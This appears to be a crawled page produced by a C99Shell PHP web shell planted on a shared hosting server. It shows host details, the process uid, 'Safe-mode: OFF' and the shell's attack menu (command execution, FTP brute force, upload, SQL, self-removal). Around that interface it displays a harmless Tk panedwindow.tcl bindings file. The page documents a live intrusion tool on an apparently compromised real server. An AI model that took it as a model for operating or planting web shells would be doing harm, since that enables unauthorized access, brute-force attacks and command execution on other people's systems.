!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/share/tk8.6/ttk/   drwxr-xr-x
Free 6182.05 GB of 6263.25 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     panedwindow.tcl (1.88 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#
# Bindings for ttk::panedwindow widget.
#

namespace eval ttk::panedwindow {
    variable State
    array set State {
    pressed 0
        pressX    -
    pressY    -
    sash     -
    sashPos -
    }
}

## Bindings:
#
bind TPanedwindow <ButtonPress-1>     { ttk::panedwindow::Press %W %x %y }
bind TPanedwindow <B1-Motion>        { ttk::panedwindow::Drag %W %x %y }
bind TPanedwindow <ButtonRelease-1>     { ttk::panedwindow::Release %W %x %y }

bind TPanedwindow <Motion>         { ttk::panedwindow::SetCursor %W %x %y }
bind TPanedwindow <Enter>         { ttk::panedwindow::SetCursor %W %x %y }
bind TPanedwindow <Leave>         { ttk::panedwindow::ResetCursor %W }
# See <<NOTE-PW-LEAVE-NOTIFYINFERIOR>>
bind TPanedwindow <<EnteredChild>>    { ttk::panedwindow::ResetCursor %W }

## Sash movement:
#
proc ttk::panedwindow::Press {w x y} {
    variable State

    set sash [$w identify $x $y]
    if {$sash eq ""} {
        set State(pressed) 0
    return
    }
    set State(pressed)     1
    set State(pressX)     $x
    set State(pressY)     $y
    set State(sash)     $sash
    set State(sashPos)    [$w sashpos $sash]
}

proc ttk::panedwindow::Drag {w x y} {
    variable State
    if {!$State(pressed)} { return }
    switch -- [$w cget -orient] {
        horizontal     { set delta [expr {$x - $State(pressX)}] }
        vertical     { set delta [expr {$y - $State(pressY)}] }
    }
    $w sashpos $State(sash) [expr {$State(sashPos) + $delta}]
}

proc ttk::panedwindow::Release {w x y} {
    variable State
    set State(pressed) 0
    SetCursor $w $x $y
}

## Cursor management:
#
proc ttk::panedwindow::ResetCursor {w} {
    variable State
    if {!$State(pressed)} {
    ttk::setCursor $w {}
    }
}

proc ttk::panedwindow::SetCursor {w x y} {
    set cursor ""
    if {[llength [$w identify $x $y]]} {
        # Assume we're over a sash.
    switch -- [$w cget -orient] {
        horizontal     { set cursor hresize }
        vertical     { set cursor vresize }
    }
    }
    ttk::setCursor $w $cursor
}

#*EOF*

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0408 ]--